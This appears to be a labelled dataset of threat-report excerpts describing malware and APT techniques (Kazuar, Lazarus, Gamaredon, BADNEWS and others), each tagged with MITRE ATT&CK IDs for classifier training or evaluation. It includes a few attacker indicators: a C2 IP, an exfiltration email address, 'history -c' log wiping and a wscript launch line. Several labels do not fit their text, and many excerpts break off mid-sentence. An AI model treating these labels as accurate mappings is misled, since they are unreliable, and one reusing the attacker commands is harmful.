{"text1":"The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c\/bin\/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems","labels":"['T1047', 'T1057']"}
{"text1":"Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet","labels":"['T1027']"}
{"text1":"1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default \u2013 this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process","labels":"['T1547.001', 'T1564.003', 'T1112']"}
{"text1":"After deobfuscation you can see \u201cImminent Monitor\u201d string which may indicate it is related to Imminent Monitor RAT","labels":"['T1070.004', 'T1123', 'T1125']"}
{"text1":"In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4","labels":"['T1059.004', 'T1573.001']"}
{"text1":"Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading\/downloading, executing files, etc","labels":"['T1105', 'T1547']"}
{"text1":"CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data","labels":"['T1039', 'T1005']"}
{"text1":"The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process","labels":"['T1071.001', 'T1055']"}
{"text1":"All the scripts are deleted immediately after being executed. TeamTNT also uses the \u201chistory -c\u201d command to clear the shell log in every script","labels":"['T1070.004', 'T1070.003']"}
{"text1":"McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact","labels":"['T1560', 'T1059.003', 'T1573.001']"}
{"text1":"Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8","labels":"['T1566.001']"}
{"text1":"Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload\/Download\/Delete files to\/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host","labels":"['T1105', 'T1083']"}
{"text1":"While the ports associated with this sample\u2019s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets","labels":"['T1095', 'T1571']"}
{"text1":"If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim\u2019s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \u201cfile-less\u201d aspect of this method","labels":"['T1059.007']"}
{"text1":"This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive","labels":"['T1083', 'T1041', 'T1071.001']"}
{"text1":"It then modifies several registry key values to disable the IE browser\u2019s functions such as auto-complete, auto-suggest, etc. The disabled keys are: \"Use FormSuggest\", \"FormSuggest Passwords\", \"FormSuggest PW Ask\" under the sub-key \u201cHKCU\\Software\\Microsoft\\Internet Explorer\\Main\u201d, and \"AutoSuggest\" under the sub-key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete","labels":"['T1112']"}
{"text1":"Indeed, any decent firewall would block incoming packets to\u00a0any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible","labels":"['T1205']"}
{"text1":"The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server","labels":"['T1105']"}
{"text1":"The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings","labels":"['T1518.001', 'T1562.004']"}
{"text1":"Strings in the malware are obfuscated using the RC4 algorithm and the decryption key stored inside the sample","labels":"['T1027']"}
{"text1":"This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on","labels":"['T1112']"}
{"text1":"Additional tools were recovered during the incident, including a network scanning\/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as \u2018spwebmember","labels":"['T1213.002', 'T1018', 'T1213.002']"}
{"text1":"Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article","labels":"['T1027']"}
{"text1":"The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails","labels":"['T1586.002']"}
{"text1":"Use of custom routines to decrypt strings (Deobfuscate\/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027","labels":"['T1140']"}
{"text1":"With the emergence of the Log4j security vulnerability, we\u2019ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems","labels":"['T1595.002']"}
{"text1":"The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously","labels":"['T1573.001']"}
{"text1":"Depending on the Ramsay version, file collection won\u2019t be restricted to the local system drive, but also will search additional drives such as network or removable drives","labels":"['T1039']"}
{"text1":"We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method","labels":"['T1036.005']"}
{"text1":"During execution, the code employs byte randomization to obscure its behavior. This is achieved by using the host\u2019s current time as a seed for a pseudorandom number generator, and then performing additional operations against that output. The resulting values are used to overwrite blocks of previously executed code. This byte manipulation is the first anti-analysis technique observed in the code, as any attempt to dump the memory segment would result in illegitimate or incorrect operations","labels":"['T1001.001']"}
{"text1":"The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised","labels":"['T1496']"}
{"text1":"Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload","labels":"['T1204.002', 'T1049', 'T1560.001', 'T1057', 'T1016', 'T1083']"}
{"text1":"It also deletes Windows Event Logs : Application, Security, Setup, System. It is less focused on deleting documents","labels":"['T1070.001']"}
{"text1":"We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion","labels":"['T1071.003', 'T1001.002']"}
{"text1":"Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this","labels":"['T1547.001']"}
{"text1":"DropBook\u2019s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them","labels":"['T1059.003', 'T1105', 'T1083']"}
{"text1":"The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included","labels":"['T1102.002']"}
{"text1":"Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection","labels":"['T1564.004', 'T1132.001', 'T1132.001']"}
{"text1":"In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below","labels":"['T1547.001']"}
{"text1":"It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage","labels":"['T1059.001']"}
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore","labels":"['T1560']"}
{"text1":"The \u201csysid\u201d parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer","labels":"['T1082']"}
{"text1":"Two days later, a second email \u2014 purportedly a warning from a Pakistani military about the Pegasus spyware \u2014 containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target. The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk","labels":"['T1566.002']"}
{"text1":"Key points PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus softwar","labels":"['T1547.001']"}
{"text1":"The Gamaredon group has been active since at least 2013. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. Typical Gamaredon compromise chain . While most of the recent publications have focused on the spearphishing emails together with the downloaders they contain, this blogpost focuses on the post-compromise tools deployed on these systems. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The most prevalent tools downloaded and installed on compromised machines can be broadly grouped into two different categories: downloaders and backdoors. Backdoors \u2013 file stealers . While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. The behavior of this module is quite straightforward: it scans the system for new Microsoft Office documents, both on local and removable drives, and uploads them to the C&C server. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module","labels":"['T1119']"}
{"text1":"Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment","labels":"['T1547.001']"}
{"text1":"The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This malware family used the new mutex \u2018com_mycompany_apps_appname_new\u2019. This variant of BADNEWS uses different filenames compared to previous versions. All of these files reside in the victim\u2019s %TEMP% directory: Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers. BADNEWS performs many of the expected functions associated with previous versions including keylogging and identifying files of interest. Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files. It continues to seek out files with the following extensions: In order to prepare for C2 communication, BADNEWS will aggregate various victim information, which is appended to two strings. C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP. Through the use of relatively new exploits, as well as a constantly evolving malware toolset, they aim to compromise prominent organizations and individuals to further their goals. One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server","labels":"['T1105']"}
{"text1":"Fast-paced intrusion \u2022 Very stealthy \u2022 Rapidly changing tactics \u2022 Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30","labels":"['T1550.003']"}
{"text1":"Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord\u2019s content delivery network (CDN). Discord\u2019s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL","labels":"['T1102']"}
{"text1":"Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications","labels":"['T1573.002']"}
{"text1":"Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server","labels":"['T1048.003']"}
{"text1":"Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software\/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address\/identity documents","labels":"['T1539']"}
{"text1":"The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger","labels":"['T1047', 'T1497.001']"}
{"text1":"APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip","labels":"['T1547.001', 'T1021.004', 'T1018', 'T1560.001', 'T1021.001', 'T1090.001']"}
{"text1":"is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate","labels":"['T1115']"}
{"text1":"At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for","labels":"['T1553.002']"}
{"text1":"All this information is stored in the C:\\Users\\Public\\Videos\\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message\u2019s Subject: set to the id","labels":"['T1074.001']"}
{"text1":"If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\\Local\\Temp\\ directory, creates a randomly-named folder under C:\\ProgramData\\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties","labels":"['T1036.004']"}
{"text1":"This report provides background on Windows container vulnerabilities, gives a technical overview of Siloscape and offers recommendations on best practices for securing Windows containers","labels":"['T1068']"}
{"text1":"Fine-tuning DaserfOur analyses revealed Daserf regularly undergo technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Ceasar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards","labels":"['T1027.002', 'T1027.005', 'T1027']"}
{"text1":"MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon","labels":"['T1105', 'T1608.001', 'T1059.001', 'T1059.005']"}
{"text1":"At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as \u201cmobile[.]recover-session-service[.]site\u201d etc","labels":"['T1583.001']"}
{"text1":"On July 18, 2018, one day after the AZORult update above was announced, we observed a campaign delivering thousands of messages targeting North America that used the new version of AZORult. The messages used employment-related subjects such as \u201cAbout a role\u201d and \u201cJob Application\u201d. The attached documents used file names in the format of \u201cfirstname.surname_resume.doc","labels":"['T1140']"}
{"text1":"The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose","labels":"['T1083']"}
{"text1":"The executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky","labels":"['T1218.007']"}
{"text1":"To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake","labels":"['T1016']"}
{"text1":"Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup\/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the\u00a0Whois Anchor Panda blog post","labels":"['T1102.002']"}
{"text1":"To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to known where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API","labels":"['T1010']"}
{"text1":"Key Points PrivateLoader is a downloader malware family that was first identified in early 2021 The loader\u2019s primary purpose is to download and execute additional malware as part of a pay-per-install (PPI) malware distribution service PrivateLoader is used by multiple threat actors to distribute ransomware, information stealers, banking t","labels":"['T1105']"}
{"text1":"AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect","labels":"['T1082', 'T1049']"}
{"text1":"It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I\/O for the writing file descriptor by using ioctl","labels":"['T1559']"}
{"text1":"The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account","labels":"['T1078', 'T1136.002']"}
{"text1":"Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz","labels":"['T1027', 'T1566.001', 'T1036']"}
{"text1":"Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process lead to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access","labels":"['T1505.003']"}
{"text1":"Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected","labels":"['T1059.006']"}
{"text1":"Winnti Linux variant\u2019s core functionality is within \u2018libxselinux\u2019. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below","labels":"['T1027', 'T1140']"}
{"text1":"Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022","labels":"['T1105']"}
{"text1":"The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite","labels":"['T1564.003']"}
{"text1":"kaudited \u2014 A file installed as \/usr\/bin\/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won\u2019t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process","labels":"['T1105']"}
{"text1":"These credentials are used in a credential stuffing or password spraying attack against the victim\u2019s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim\u2019s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim\u2019s remote service to access the victim\u2019s network, and starts using the Cobalt Strike beacon for remote access and command and control","labels":"['T1078.002']"}
{"text1":"TIN WOODLAWNTIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool","labels":"['T1059.001']"}
{"text1":"As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey","labels":"['T1012']"}
{"text1":"Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer","labels":"['T1566.001']"}
{"text1":"The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry","labels":"['T1059.003']"}
{"text1":"A typical response from the C2 server is a legitimate-looking webpage containing the string \u201c!DOCTYPE html\u201d, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode","labels":"['T1140']"}
{"text1":"One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication patterns and attribution patterns","labels":"['T1059.007']"}
{"text1":"The malware will collect data from the victim machine and write this information to LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp. The following information is collected from the victim","labels":"['T1074.001']"}
{"text1":"Like most ransomware, Sodinokibi encrypts files and adds a random extension such as \u201ctest.jpg.1cd8t9ahd5\u201d (Data Encrypted for Impact, ATT&CK T1486). It also drops a ransom note in folders that contain encrypted files. The name of the ransom note is the random extension added to the encrypted files. For example, if the extension is \".1cd8t9ahd5\", the ransom message filename will be called \"1cd8t9ahd5-HOW-TO-DECRYPT.txt","labels":"['T1486']"}
{"text1":"The DUBNIUM samples are distributed in various ways, one instance was using a zero-day exploit that targets Adobe Flash, in December 2015","labels":"['T1203']"}
{"text1":"The payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions \u2013 a combination of SHL\/SHR\/SUB\/ADD\/XOR \u2013 with hardcoded keys","labels":"['T1140']"}
{"text1":"This recent APT10 activity has included both traditional spear phishing and access to victim\u2019s networks through service providers. For more information on infection via service providers see M-Trends 2016). APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g. Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases simply identically named decoy documents and malicious launchers within the same archive","labels":"['T1204.002']"}
{"text1":"Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell","labels":"['T1059.003', 'T1505.003']"}
{"text1":"This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious","labels":"['T1057']"}
{"text1":"On June 12, QakBot continued its evolution. The delivery method of a .ZIP file to malicious .VBS was the same, but this time QakBot also dropped a Zloader payload on its victim. Beginning around 14:24 UTC, Falcon Complete observed QakBot threat actors using a new .VBS payload","labels":"['T1059.005']"}
{"text1":"While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit","labels":"['T1041']"}
{"text1":"Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder","labels":"['T1036.004', 'T1574.002']"}
{"text1":"The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe \/\/e:vbscript \/\/b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe","labels":"['T1140']"}
{"text1":"The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro","labels":"['T1104']"}
